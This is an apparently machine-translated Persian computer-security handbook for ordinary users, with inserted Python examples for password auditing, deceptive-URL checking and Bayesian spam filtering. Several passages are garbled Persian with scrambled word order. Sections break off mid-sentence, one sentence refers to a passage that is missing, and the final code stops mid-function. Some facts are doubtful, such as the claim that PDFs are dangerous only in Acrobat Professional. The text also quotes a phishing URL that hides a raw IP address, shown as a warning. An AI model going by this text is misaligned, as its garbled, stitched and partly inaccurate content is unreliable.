o Classic passwords such as "Xyzzy" or "Plover" (passwords used in many
o Repeated or sequential letters or digits, such as "123456", "aaaa9999" or "ABCDE".
• In some systems the number of characters in the password has to be above a certain amount and the password has to contain digits as well. If you are a slow typist and someone watches you and the keyboard from behind, they will be able to work out your password.
• Whatever your password is, you must commit it to memory without writing it down. Never write your password anywhere, and never leave it at your workplace or on address labels.
• Never store an unencrypted list of passwords in files on the computer.

The best password is a random string of letters and digits, but for most of us such passwords are very hard to remember.

Suitable passwords for systems that accept letters, numbers, special symbols and spaces, and that distinguish between upper-case and lower-case letters. These passwords are easy to remember, but very hard to find in a dictionary or to guess.

Password: Computers Are Useful
Description: A phrase that many computer users agree with.

Password: Computers aReuseFul
Description: The original phrase without spaces and with numbers placed between every 4 letters.

Password: Comutrsa
Description: The original phrase with a few letters left out.

Password: Onupatithwa
Description: Stories usually begin with the phrase "Once upon a time, there was". In this example two letters have been taken from the start of each word, so that the length of the password is limited while it remains unrecognizable.

Password: T-1thuua @oNup
Description: The same phrase as before, with the substitutions and symbols described above applied to it.

which are fewer than the system administrator's privileges. When the administrator and the user of a computer are the same person (as on many personal computers), the user does all of his or her work with full access privileges (root privileges or administrator privileges), whereas it is better to use a separate user name for non-administrative activities. Doing so reduces the chance of damaging the system by accident, and also considerably reduces the damage done to the system if an attacker breaks in.
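The passage on one-way encryption above explains why a dictionary word such as birthday is recovered even though the stored value cannot be decrypted. The following Python sketch is an added example, not part of the handbook; the function names and the small word list are assumptions made for illustration. It shows the weak, unsalted scheme next to a salted, deliberately slow record (PBKDF2 from the standard library), and an audit that flags accounts whose stored value equals the hash of a listed word.

```python
import hashlib
import hmac
import os

# Constructed sample word list standing in for a dictionary file.
WORDLIST = ["password", "birthday", "computer", "xyzzy", "plover"]


def unsalted_hash(password):
    """One-way, but the same password always produces the same stored value."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def guessable_accounts(stored, wordlist=WORDLIST):
    """Audit a {user: unsalted hash} table for passwords that are listed words."""
    table = {unsalted_hash(word): word for word in wordlist}
    return {user: table[value] for user, value in stored.items() if value in table}


def make_record(password, iterations=100_000):
    """Salted, deliberately slow one-way record (PBKDF2-HMAC-SHA256)."""
    salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return {"salt": salt.hex(), "iterations": iterations, "key": key.hex()}


def check_password(password, record):
    """Re-derive the key from the typed password and compare in constant time."""
    key = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                              bytes.fromhex(record["salt"]), record["iterations"])
    return hmac.compare_digest(key.hex(), record["key"])


if __name__ == "__main__":
    # Constructed accounts: one dictionary word, one phrase-derived password.
    stored = {"user1": unsalted_hash("birthday"),
              "user2": unsalted_hash("T-1thuua @oNup")}
    print(guessable_accounts(stored))
    first, second = make_record("birthday"), make_record("birthday")
    print(first["key"] != second["key"], check_password("birthday", first))
```

A per-user salt means two people with the same password no longer share a stored value and a table computed once cannot be reused, but a dictionary word can still be guessed one account at a time, which is why the rule against single words stands.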
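The password rules listed in this chapter (no single dictionary word, look-alike substitutions and reversed spelling give little protection, no personal details, no repeated or sequential characters, mixed case in unpredictable places) can be checked mechanically. The following Python sketch is an added example, not part of the handbook; the function names, the finding labels, the tiny word list and the run length of four are assumptions made for illustration.

```python
import itertools

# Look-alike substitutions listed in the text: symbol -> letters it may stand for.
LOOKALIKES = {"1": "il", "3": "e", "#": "e", "0": "o", "@": "a", "5": "s"}
CLASSIC = {"xyzzy", "plover"}
# Constructed stand-in for a real dictionary file.
WORDS = {"birthday", "computers", "useful", "icon", "coke", "better"}


def plain_forms(password, limit=4096):
    """Readings of the password with look-alikes undone, forwards and backwards."""
    options = [ch + LOOKALIKES.get(ch, "") for ch in password.lower()]
    forms = set()
    for combo in itertools.islice(itertools.product(*options), limit):
        word = "".join(combo)
        forms.update((word, word[::-1]))
    return forms


def has_run(password, length=4):
    """True if `length` characters in a row repeat or step by one (aaaa, 1234, dcba)."""
    codes = [ord(c) for c in password.lower()]
    for step in (0, 1, -1):
        run = 1
        for a, b in zip(codes, codes[1:]):
            run = run + 1 if b - a == step else 1
            if run >= length:
                return True
    return False


def audit_password(password, personal=(), words=WORDS):
    """Return the list of rules from the text that the password breaks."""
    findings = []
    forms = plain_forms(password)
    if forms & CLASSIC:
        findings.append("classic-password")
    if forms & set(words):
        findings.append("dictionary-word")
    tokens = [p.lower().replace(" ", "") for p in personal]
    if any(len(t) >= 3 and t in form for t in tokens for form in forms):
        findings.append("personal-detail")
    if has_run(password):
        findings.append("repeated-or-sequential")
    letters = [c for c in password if c.isalpha()]
    if not (any(c.isupper() for c in letters) and any(c.islower() for c in letters)):
        findings.append("single-case")
    if password.isalpha():
        findings.append("no-digit-or-symbol")
    capitals = [i for i, c in enumerate(password) if c.isupper()]
    if capitals and all(i == 0 or not password[i - 1].isalpha() for i in capitals):
        findings.append("predictable-capitals")
    return findings


if __name__ == "__main__":
    for candidate in ["birthday", "B1rthd@y", "yadhtrib", "aaaa9999", "T-1thuua @oNup"]:
        print(repr(candidate), audit_password(candidate))
```

The disguised forms "B1rthd@y" and "yadhtrib" are reported as the same dictionary word as "birthday", which is the point the text makes about substitutions and backwards spelling.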
٦٥ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺩﺭ ﺷﺮﺍﻳﻄﻲ ﻛﻪ ﺍﺣﺘﻤﺎﻝ ﺧﻄﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺭﺣﺎﻝ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺖ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺑـﺴﺘﺔ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﻛـﻪ ﺑـﻪ ﺭﻭﺵ ﻓـﻮﻕ .۲
ﺭﺍﻩ ﺍﻭﻝ ﻣﻨﻄﻘﻲ ﺑﻨﻈﺮ ﻧﻤﻲﺭﺳﺪ .ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺗﻨﻬـﺎ ﮔﺰﻳﻨـﺔ ﻣﻨﺎﺳـﺐ downloadﻣﻲﺷﻮﺩ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻭﺍﻗﻌﻲ ﻧﻴﺴﺖ ،ﺑﻠﻜـﻪ
downloadﻛــﺮﺩﻥ ﻭ ﺑــﻪﺍﺷــﺘﺮﺍﻙﮔﺬﺍﺷــﺘﻦ ﻭﺻــﻠﻪﻫــﺎ ﻭ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺯﻣﺎﻥ ﺍﺟﺮﺍ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻭﺍﻗﻌـﻲ ﺭﺍ
ﺍﺻﻼﺣﻬﺎﻱ downloadﺷﺪﻩ ﺍﺳﺖ. downloadﻣﻲﻛﻨﺪ .ﺍﻳﻦ ﺑﺮﻧﺎﻣـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺗﻨﻬـﺎ
... be 500 kilobytes in size, which counts as small for a software update package; but in fact this is only a program that downloads the real update and then installs it, and the real update may be around 30 megabytes.

3. Some programs have predefined functions that dynamically check for released updates and, with the user's permission, download and install them.

These capabilities are designed to make your work easier. In every case, the job of selecting exactly the update packages you need (which is complicated for the operating system and for particular applications) is done automatically by programs.

The problem for developing countries

As you can see, many update processes are designed to run in an Internet-connected environment and download update packages of several megabytes. This approach therefore works only if you have a high-speed Internet connection or can keep your telephone connection open for several hours. In developing countries this is usually not possible.

There are two ways of dealing with this problem:

1. Give up on updating your applications and operating system.
2. Ask someone else to download the update package and provide detailed installation instructions. The update package can then be distributed on compact discs or over a local network.

There are several ways to do this:

• If an organization has many machines, the technical administrator should take responsibility for downloading and installing their update packages.
• Computer clubs or other groups can download update packages and make them available to their members.
• Internet service providers (ISPs) can obtain the update packages for popular products and common operating systems and distribute them locally to their users. This reduces the ISPs' need for international bandwidth and so also lowers their costs.
• Computer stores can make update packages available to their customers.
• In 2003, when an Internet worm left computers vulnerable, Microsoft distributed update packages on compact discs in various countries to counter it. This method can still be used.

Although the last three ways of distributing update packages are not very common, the growing need to keep software up to date means they could become an effective business strategy for ISPs and vendors in developing countries. Such support strategies are welcome, but users must make sure that local update sources are also trustworthy. If the local sources are not trustworthy, they may turn into a hub for distributing viruses and Trojans.
Should update packages be installed promptly after release?

This debate has been going on among computer specialists for decades. There are two different views:

In favor: If you install update packages promptly, you have protected yourself against known vulnerabilities. With the protection gained from the packages ...

... prioritize the remaining update packages according to what they do. A delay of a few weeks or months in installing these packages lets adventurous users install the update packages, find and report possible problems, and so, before you have installed the updates yourself, give the vendor a chance to fix the new defects.
... use it and the service that supplies its updates is suddenly discontinued, or you cannot afford to buy it. Some software, such as virus scanners, can be far more dangerous when it is not updated regularly (daily or weekly) than when it is not used at all, because if you use it you assume that your security is in good shape.

Open source software

Open source software, which is spreading rapidly, needs to be properly supported. In some cases the software itself is offered free of charge, but update or support services may cost money. The free version of Red Hat Linux that is available to the public is a good example of this kind of software. Organizations that want a higher level of technical support may buy the original software package, or at least its support services. If you decide to use software that is free both to obtain and to support (as some free and open source software is), bear in mind that corrected versions may be available only for a short time. So if you have chosen unsupported software for your operating system or important subsystems, you should update to its new version at regular intervals (for example every six months).

Updating open source products is much harder than updating products such as Microsoft Windows, but the installation instructions available for the major open source products take care of this problem too. There is also Windows-based open source software that is distributed in compiled form and uses simple installers.

As with Windows systems, the update packages and patches provided for large open source systems vary with the size of the system. Finding local sources for these update packages, so as to cut the time needed to download them from the Internet, is very important for individual users.

The last point about open source software calls for some discussion. Supporters of open source software and supporters of traditional proprietary software argue about which of the two is more secure.

Supporters of proprietary software hold that:

• Because the source code of open source products is available, intruders can easily analyze the program and identify every flaw through which the system can be penetrated.
• Because many people in different places, with no organizational ties, may work on open source products, standards may be ignored, and the resulting lack of consistency between components may lead to security vulnerabilities.
• Because users pay the vendor for proprietary products, they follow the vendor's instructions, and this leads to high-quality security considerations in proprietary software.
• Because no identifiable party is responsible for open source products, security is very likely to be neglected if it does not matter to the individual developers.

Supporters of open source software hold that:

• Because many people work with the source code, problems are spotted by experts and fixed quickly.
• People who work on proprietary products may produce consistent code, but if the vendor places no particular value on the security of its product, the program cannot reach a satisfactory level of security.
• With proprietary programs, fixing a problem always means going back to the vendor, and this can cause long delays.
Pirated software

Neither the authors nor the publishers of this book promote software piracy, but it would be naive to pretend that the problem does not exist. Software piracy is found all over the world, but it is most common in countries where the cost of legal software relative to wages is far higher than in developed countries, where local legal authorities and law enforcement work together to make violations very unlikely.

Apart from the legal duty of the authorities to prevent infringement of the producer's property rights, there are two security points about pirated software that need to be considered. Neither is very common in pirated software, but both may be present at the same time.

1. Pirated software may not be updatable, or updating it may stop it from working.
2. Some pirated software may contain functions that you do not expect. These may include backdoors, keyloggers, or other kinds of malicious software.

... perform.
Overview

This chapter examines the concept and the different types of malicious software (such as viruses, Internet worms and Trojans) and the mechanisms used to distribute them.

Introduction

Malicious software

The short name for malicious software is malware. This software is usually designed to harm or damage a system.

The first computer virus was identified in 1981. The concept of the computer worm was introduced in the book "Science Fiction" in 1975, and its first real activity dates from the early 1980s. Interestingly, these worms were originally designed to do something positive and useful. Computer Trojan horses go back to the first days of time-sharing (the 1960s). Despite the long history of this kind of software, it is only in recent years that its destructive effects have become severe and dangerous for ordinary users.

We must begin by defining what these terms mean.

Virus
A virus is a program that attaches itself to the end of another program or inserts itself into the body of another program. When that program ...

Internet worm
Worms resemble viruses in that they replicate themselves, but they do not need a host program to do so. Like a virus, a worm may do nothing more than copy itself to different places, or it may carry out other operations as well. A worm works only when the system is able to accept external resources and can run programs through those resources. Some vendors of malware detection tools count worms as a kind of virus.

Trojan horse
The name of this kind of software comes from the legend of the war over the city of Troy in Greece. In the legend, the Greeks send a large wooden horse in through the city gate, and once the horse is inside the city a large number of Greek soldiers come out of it and capture the city. Ever since, "Trojan horse" has meant something that looks ordinary but has dangerous contents. In computing, a Trojan horse can cause a great deal of damage or do things other than what the user expects. In recent years the term has been applied to malicious programs that usually enter a system without the user's knowledge or permission and then collect and send out information.
... use it for printing or sending letters, even that may be of use to attackers. Putting these pieces of information together can allow an attacker to misuse your identity. If you work for a commercial company and store other people's credit card numbers on your computer, you will face serious problems if those numbers are stolen.

... you start a particular program, it runs. The only limit on what these programs can do is the imagination and skill of their author.

Network tracking and modification software

Programs of this kind watch the sites you visit and can, in addition to what you ...
The remote user may have gained complete control of your system. Such software can even stop you from carrying on with your work if it chooses to. In that case your computer is under someone else's command and you are not aware of it. The question that arises is why an attacker would want to take control of your system. There can be many reasons for doing so, including that the attacker:

• has no reason other than to prove their ability to their friends;
• simply wants to be destructive;
• has a personal reason for targeting you;
• wants to use your computer for other malicious activities, such as sending spam or carrying out denial of service (DoS) attacks against other computers; or
• wants to steal valuable information.

Note that software with similar functions, under names such as remote access tools or remote administration tools, is legitimate and very widely used. If you use these tools for your own work, make sure that you have applied appropriate security measures such as user names and passwords.

Keyloggers

What a "keylogger" does is clear from its name. Keyloggers record every key pressed on the keyboard and store the keystrokes in a file. This file can be used later by someone who gets in through a backdoor, or it can be sent to the author of the program by e-mail or over the web. It is worth noting that a keylogger watches everything you actually type, not what is sent over the network. So even if you enter your credit card number on a secure web page (that is, one where encryption is used when the information is transferred), this program records exactly what you type, unencrypted.

Financial theft

In most thefts that have resulted from attacks on personal computers, what was taken from the victim's computer was information. There are, however, cases in which parasitic programs have been used to spend stolen money automatically. The simplest example is a program that finds a modem on your computer and uses it to place calls to distant destinations. Since the program cannot talk, this brings the attacker no benefit other than a kind of malicious satisfaction that you will receive a heavy bill from the telephone company at the end of the month.

In other cases the attacker can profit personally. In many countries there may be special telephone numbers for which the telephone company charges the caller a higher rate per minute and passes part of that charge to the party that was called. This arrangement is used in various kinds of transactions, but it is used mostly by software companies that want a simple way of charging you for support that is not covered by warranty. The telephone company calculates the callers' charges in such a way that it can pass part of them, as the fee for support calls, to the company that was called. If an intruder has such a number, they can program your computer to call it and keep the call open for a while. The charge will then appear on your end-of-month telephone bill.

How is this software identified?

A few years ago the only way a personal computer could be infected by a virus or malicious software was through infected disks, and if you did not exchange files with people who had been infected you were safe. UNIX systems were not very prone to viruses, but because of their extensive communication capabilities and because of security flaws in operating systems and some common applications, even in those days intruders were sometimes able to gain access to systems and install backdoor software on them. The first serious Internet security incident was a worm that in ...

The second change is that, because of the effort to make e-mail software simpler and more powerful, HTML code can now be included in the main body of an e-mail, even though HTML can contain troublesome instructions. For example, HTML can automatically send the web browser to a predetermined website that may not be suitable for you or your children.
... from inside the main program. A common example is the "Adobe Acrobat Reader" program, which lets you view PDF files while browsing the web. Once plug-ins or add-ons are installed they can do anything the main program can do, such as reading from and writing to the disk or using the network connection, so they should be installed and used only when their source is completely trusted.

Security holes

Security holes are flaws in parts of the operating system or other system components that give an attacker access to the information on the system or control over it. In recent years most software vendors have responded reasonably quickly to security problems discovered in their systems. So if you apply security patches to your system regularly, you can close the routes of intrusion to attackers before the flaws become widely known.

File sharing

File sharing exists in various forms in every operating system. Sharing files among the employees of a company is very useful. If you have several different machines, sharing files between them is a much-needed capability. However, if you share files over the Internet and do not have a suitable security policy for doing so (such as proper user names and passwords, and restricted write and update privileges), then any attacker in the world will be able to share your files too. In addition, if you allow others to write to your disks, an attacker will be able to configure your computer however they like.

Drive-by downloads

A "drive-by download" happens when you visit a website and the HTML code in the page automatically requests a Java or ActiveX program, and that program in turn downloads another program and runs it, or arranges things so that it can run it later. HTML code can also be placed in an e-mail. If you have given Java or ActiveX programs permission to install software without asking you, or even without telling you, they will be able to download and install whatever they want.

Distrust of pirated software

Pirated commercial software is not a new idea. Counterfeit compact discs have been sold for many years, and their Internet versions, known as Warez, are also common. It has long been suspected that these discs may contain viruses, but the greater likelihood is that this kind of software deliberately contains a patch that allows an unauthorized person to reach your computer over the Internet. Because installing most software requires administrator privileges, this gives a good opportunity for programs you never asked for to be installed.

Hidden functions of legitimate software

Most of the software you download may well be clean, but there is a high probability that downloaded software (especially free software) will install other programs on your machine. Peer-to-peer file sharing programs are particularly prone to this. These programs usually include other programs, many of which fall into the category of web tracking and modification programs: they watch your web browsing, display all kinds of advertisements, and report your activities to their controller. Some of these programs are devious, in that they try to hide themselves and to be almost impossible to remove. Such a program comes with an uninstall tool, and if you run it the tool removes the uninstall tool itself, but the main program is still there and will still run.

Non-persistent malware

Not all malware runs on your computer. It has become very common for such software to send an e-mail that somehow persuades the user to visit its website. The traditional trick is for the e-mail to offer you something you are interested in, but while you are looking at the website it points to, several pieces of malicious software attack your system and may download some kind of software onto it (much like a "drive-by download") or carry out other operations. In the newer methods the e-mail claims to be a bill from eBay (an Internet auction website) or PayPal (a website for Internet payments), or to come from your bank. The e-mail looks very trustworthy and shows you websites where you can validate your credit card number. The URLs given in these e-mails usually look very much like valid URLs. For example, the real URL of PayPal is www.paypal.com, and the URL displayed in the e-mail may be exactly that address. What is shown on the page, however, is not the real URL that is used to reach the page. The real URL is usually hidden and may look like this:

http://www.paypal.com:user=3245329:transaction=43293:code=4333033.33@218.5.79.162

Someone who is not familiar with the fine points of URL format will assume that this address is www.paypal.com and can therefore be trusted, but in fact the characters before the @ sign should be disregarded, because this URL connects to the address 218.5.79.162. That website usually carries a page that looks like the real PayPal page and asks you to log in and enter your credit card number. In reality the website never connects to PayPal; it belongs to someone who is trying to steal your credit card and the information that goes with it. These tricks have been very successful in practice.

Bear in mind that similar e-mails may be genuine, legitimate messages that really were sent by PayPal. An official e-mail sent for this purpose usually contains unique information that cannot be obtained from your e-mail address, such as your full name or the last four digits of your credit card. If the e-mail directs you to a website it will also give you its address, but it will not contain a link to a web page. The destination web pages also contain information that no fraudster or spammer could know. If you are still in doubt, you can contact the company concerned by telephone (not by e-mail) and confirm that the message is genuine.
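The deceptive address quoted above can be checked mechanically. As an added example (not code from the handbook), the following Python parses a link the way a browser does and reports the host it really connects to, together with the warning signs the text describes; the function and finding names are assumptions made for this illustration, and the URL and IP address are the ones quoted above.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Rough shape of a DNS host name such as www.paypal.com (illustrative, not a full validator).
HOSTNAME_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.IGNORECASE)

# The deceptive link quoted in the text.
PAGE_EXAMPLE = ("http://www.paypal.com:user=3245329:transaction=43293"
                ":code=4333033.33@218.5.79.162")


def _is_ip(host):
    """True if host is a literal IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def _host_of(text):
    """Host that a piece of visible link text claims to point at, or None."""
    candidate = text.strip()
    if "://" not in candidate:
        candidate = "http://" + candidate
    try:
        host = urlsplit(candidate).hostname
    except ValueError:
        return None
    if host and (HOSTNAME_RE.match(host) or _is_ip(host)):
        return host.lower()
    return None


def inspect_link(href, displayed_text=""):
    """Report where href really connects and which warning signs it shows.

    Everything between '//' and the last '@' of the authority part is
    user information, not the destination, so it is split off first.
    """
    parts = urlsplit(href)
    host = (parts.hostname or "").lower()
    userinfo = parts.netloc.rpartition("@")[0]
    decoy = userinfo.partition(":")[0]

    findings = []
    if userinfo:
        findings.append("userinfo-before-@")
        if HOSTNAME_RE.match(decoy) and decoy.lower() != host:
            findings.append("userinfo-imitates-hostname")
    if _is_ip(host):
        findings.append("host-is-raw-ip")
    shown = _host_of(displayed_text) if displayed_text else None
    if shown and shown != host:
        findings.append("displayed-host-differs")

    return {"connects_to": host, "decoy": decoy or None, "findings": findings}


if __name__ == "__main__":
    print(inspect_link(PAGE_EXAMPLE, "www.paypal.com"))
    print(inspect_link("https://www.paypal.com/signin", "www.paypal.com"))
```

A mail filter or proxy could apply the same check to every link in a message and quarantine those that return any finding.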
Chapter Six
Network Services Security

E-mail

Evolution

If you look back over the history of the network (the past 10 to 30 years), you will see that e-mail was at first used only to send text messages. Most systems that used e-mail used a variety of methods for ...
How can you protect yourself?

Remember that programs such as Microsoft Word (word processor), Microsoft Excel (spreadsheet) and all similar programs can use macros, which can contain viruses. Even PDF files can contain malicious code fragments (although these files can be dangerous only when they are opened with the Adobe Acrobat Professional application; opening them with programs such as Adobe Acrobat Reader, which is more widely used, carries no particular risk). The user manual or help pages will tell you how to turn off certain features (especially those that are rarely used on your system).

Rule eight:
Never open attachments, even those sent by people you know and trust, unless you are sure that the person has checked the attachments and sent them to you deliberately.

Your friend's machine may have a virus that, without your friend's knowledge, sends infected files to everyone in their address book.

Rule nine:
Check the configuration of your e-mail program so that it does not process fancy HTML and does not send infected files to other computers.

This means that you may lose some of the decorative features of e-mail, but in return you gain better control over what your e-mail program does. Note that in some e-mail programs you do not even need to open a message containing HTML code for the code to run; having the message appear in the preview pane is enough. Although an e-mail can contain fragments of HTML code, many browsers and e-mail programs allow you to disable cookies, JavaScript and plug-ins for pages received as part of an e-mail.

Rule ten:
Ask your ISP whether it checks e-mail messages for viruses and similar threats before passing them on.

Because worm and virus activity keeps increasing, most ISPs do this. Do not expect your ISP's filtering to be one hundred percent effective, but preventive action by ISPs can support your own security efforts. If your ISP is not aware of security issues, it is a good idea to work with it so that it provides a safer service to you and to its other customers. You could, for example, give it a free copy of the book you are reading now!

Spam

Spam is the name used for unwanted e-mail, especially commercial messages sent in bulk by unknown senders, presumably in the belief that the recipient will become interested in their products. The amount of spam has grown dramatically in recent years. In 2003 more than 50% of all the e-mail exchanged on the Internet was spam! Many people now receive about 10 spam messages for every legitimate message.

If spam messages carried a phrase such as "**SPAM**" in the subject field, we could easily delete them all. Laws have been passed under which any unsolicited e-mail sent by a commercial company is liable to prosecution. However, because of the sheer volume of spam and the limited capacity of law enforcement, enforcing laws of this kind is not very practical at present. Everyone needs a sensible way of recognizing and deleting spam without reading it and without sending a complaint to an overloaded complaints system.
More about spam

To understand the problems that spam brings, three points need to be considered:

(a) How spammers obtain your address.
(b) What counts as spam (in precise detail).
(c) Why spammers send it.

(a) Spammers have an opportunity to obtain your address if you have done any of the following:

• sent a message or your signature to a public mailing list;
• replied to a spam message, for example to ask to be removed from the list of recipients;
• posted a message to a newsgroup;
• filled in a web form for any reason and entered your address in it (even if you are completely sure that you were dealing with a reputable organization);
• used a computer on which an ident daemon was running (on many UNIX systems this identification program gives your user name to anyone who asks for it);
• allowed your browser to store your address;
• used instant messaging software;
• put your e-mail address on a web page, that is, allowed your e-mail address to be visible to everyone;
• registered a domain name for yourself, or listed your address as the technical support contact of a website;
• used an e-mail address that is easy to guess;
• put your address on a system that has previously been broken into.

If any of these applies to you, there is a good chance that your address will be misused or even sold to spammers. In other words, if you use the Internet for any purpose at all, you may end up on the recipient lists of spammers.

(b) Some commercial messages are so numerous and so irrelevant that they are well known, and everyone recognizes them as spam. For other messages it is less obvious. In some cases it is up to the recipient whether a message they have received is spam or not. The following examples help to make this clearer:

• Is an e-mail containing information about how to care for the features of your face spam? Answer: Yes, it is spam, unless you are a plastic surgeon and the e-mail is an academic paper rather than a commercial advertisement.
• Is a call for papers for an academic conference on an obscure subject, sent to several mailing lists, spam? Answer: Perhaps, unless the subject happens to interest you and you want to respond.
• Has a company that sold you a product, and that sends information about its next product to you and many other customers, sent spam? Answer: No. But the spam filtering program at your ISP may spend a long time examining the message to decide whether or not it is spam.
• If an e-mail contains material that would be considered spam by any definition, is it necessarily spam? Answer: Yes, but only if it is the original that was sent. If, for example, one of the readers of this book sent the message to the authors because it contained interesting examples of spam, it is certainly not spam and should not be filtered.

(c) Why do spammers send spam to people? The simplest answer: because it works! If you study spam, you quickly notice a pattern. Spam is usually about matters such as making or saving money, improving your emotional or private life, and improving your health. These subjects have one important thing in common: most of us worry seriously about them, and some of us pay a great deal of attention to them. So even if only a very small percentage of recipients follow up these messages (say about 1 in every 100,000 recipients), spammers who send several million messages a day can make a lot of money this way.

What should be done about spam?

There are many ways in which spam can be limited and controlled. Some governments have passed laws in their jurisdictions to prevent the spread of spam. Most ISPs hold that using their facilities to send spam is against their terms of service. Passing such laws can be effective, but so far enforcing most laws on spam has been very difficult and expensive, and in many cases no means of enforcement has been worked out.

Some major users of e-mail (such as companies) refuse to accept e-mail that comes from ISPs that allow spammers to operate. This can be effective, because it forces the ISPs to put a stop to spam-related activity. However, it usually also hurts innocent customers who send a small number of e-mails to various destinations. There are many programs that detect spam, delete it, or warn the recipient that a spam message has arrived. These programs can be run at the ISP's site or in the mail client. They examine the content of a message and where it was sent from, but because these criteria are hard to evaluate, the programs usually produce both false negatives and false positives.

False Negative
A false negative occurs when the scanning program reports that an e-mail is not spam when in fact it is. This means that the program lets spam through the filter, and it is the reason such a program is said to be possibly less than 100% effective.

False Positive
A false positive means that the scanning program declares some harmless messages to be spam. This does a great deal of damage, especially if the message is deleted instead of being delivered as a result. Because of false positives, ordinary harmless e-mails may be lost beyond recovery.
ﺭﻭﺵ ﺍﻣﻴﺪﻭﺍﺭﻛﻨﻨــﺪﺓ ﺟﺪﻳــﺪ ﺿــﺪ ﻫﺮﺯﻧﺎﻣــﻪ ﺭﻭﺷــﻲ ﺑــﻪ ﻧــﺎﻡ ﻫﺪﻑ ﺑﺮﻧﺎﻣﻪ ﻫـﺎﻱ ﺟـﺴﺘﺠﻮﻱ ﻫﺮﺯﻧﺎﻣـﻪ ﺑـﻪ ﺣـﺪﺍﻗﻞ ﺭﺳـﺎﻧﺪﻥ
Bayesian Filteringﺍﺳـــﺖ .ﺩﺭ ﺍﻳـــﻦ ﺭﻭﺵ ﻗـــﻮﺍﻧﻴﻦ False Negativeﻭ ﺍﺯ ﺑــﻴﻦ ﺑــﺮﺩﻥ False Positive
ﻏﺮﺑﺎﻝﺳﺎﺯﻱ ﺑﺎ ﺷﻨﺎﺧﺖ ﺷﻤﺎ ﺍﺯ ﻫﺮﺯﻧﺎﻣﻪ ﺍﺻﻼﺡ ﻣﻲ ﺷـﻮﺩ .ﺍﻳـﻦ ﻻ
ﻣــﻲﺑﺎﺷــﺪ .ﻣﺘﺄﺳــﻔﺎﻧﻪ ﻛــﺎﻫﺶ False Negativeﻣﻌﻤــﻮ ﹰ
increases false positives. People who for whatever reason need to receive e-mail that resembles spam may be harmed by this. The most recent reported instance involved a university newsletter that discussed spam. Because the newsletter contained examples of spam, scanners identified it as spam, and several ISPs filtered and deleted it.

In addition to spam scanners, there are also spam-filtering methods that use challenge-response techniques. In this method, when a message arrives from an unknown sender, it is held in transit (before the recipient opens it). A challenge is then sent to the sender asking them to confirm the message they sent, to prove that it came from that person and not from someone else or from a piece of software. The confirmation form is designed so that it cannot be handled automatically, and it is also of no use for subsequent spam messages. If no confirmation is received within a few days, the message is deleted instead of being delivered. The problem with this method is that it requires manual intervention by the sender. If you send a message and are unable to respond promptly to the confirmation request, your message will not be delivered. Also, if two ISPs both use this service, they may never receive mail from each other, because the first recipient does not see the message unless it has been confirmed, and the confirmation request will not be passed on either, because its sender is unknown. Some spam filters, instead of deleting suspicious messages, place them in a special folder. You can then check the spam folder periodically to make sure that its contents are not victims of false positives.

The rules can vary for each recipient. The aim of this method is for the filtering program to learn from your behavior, so that it can recognize the people you trust and reject content that is not normally identified as spam but that for whatever reason is of no interest to you. Bayesian filters use linguistic techniques to let through messages containing particular words that, based on past experience of your e-mail behavior, are used in your genuine mail but rarely appear in spam. Bayesian filters are available for most e-mail programs.

If spam has become a problem for you, you should check whether your ISP offers spam detection and filtering. You should also check your e-mail software to find out whether it can filter spam.

Using the World Wide Web
When this book was written in 2003, the Web had been available to the public, with varying levels of access, for about 10 years. Today the Web is essential for those who regularly use the network for work, school and leisure. Because the Web has become a useful and commonplace tool, it has been forgotten that it can be a hostile environment.

Keeping browsers secure
In general the Web is relatively safe, but using it also carries potential risks. Web sites usually contain static text and images, but they can also contain dynamic programs intended to run on your computer.
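The spam-filtering discussion above describes a fixed-rule scanner deleting a university newsletter about spam, and Bayesian filters that learn from the recipient's own mail. The following Python code is an added example, not part of the handbook; the keyword list, the training messages and the test messages are all constructed for illustration, and the filter is a plain naive Bayes classifier with add-one smoothing.

```python
import math
import re
from collections import Counter

# Constructed keyword list for a fixed-rule scanner (assumption for this example).
SPAM_KEYWORDS = {"viagra", "lottery", "winner", "free"}

# Constructed training mail: what this recipient really receives vs. known spam.
HAM = [
    "faculty seminar on campus this friday",
    "campus newsletter faculty research grants",
    "seminar schedule for the faculty newsletter",
    "library hours on campus during exams",
]
SPAM = [
    "free lottery winner claim your prize now",
    "winner free viagra cheap pills now",
    "claim free prize lottery now",
    "cheap pills free shipping now",
]

# Constructed test messages.
NEWSLETTER = ("Campus newsletter: faculty seminar about spam, "
              "with examples such as 'free lottery winner'")
REAL_SPAM = "You are a lottery winner, claim your free prize"


def tokens(text):
    return re.findall(r"[a-z]+", text.lower())


def keyword_scanner(text):
    """Fixed rules: flag any message that contains a listed word."""
    return any(t in SPAM_KEYWORDS for t in tokens(text))


class BayesFilter:
    """Naive Bayes over word presence, trained on one recipient's mail."""

    def __init__(self):
        self.word_docs = {"spam": Counter(), "ham": Counter()}
        self.docs = {"spam": 0, "ham": 0}

    def train(self, text, label):
        self.docs[label] += 1
        self.word_docs[label].update(set(tokens(text)))

    def spam_probability(self, text):
        # Sum log-likelihood ratios; add-one smoothing keeps unseen words neutral.
        log_odds = math.log((self.docs["spam"] + 1) / (self.docs["ham"] + 1))
        for t in set(tokens(text)):
            p_spam = (self.word_docs["spam"][t] + 1) / (self.docs["spam"] + 2)
            p_ham = (self.word_docs["ham"][t] + 1) / (self.docs["ham"] + 2)
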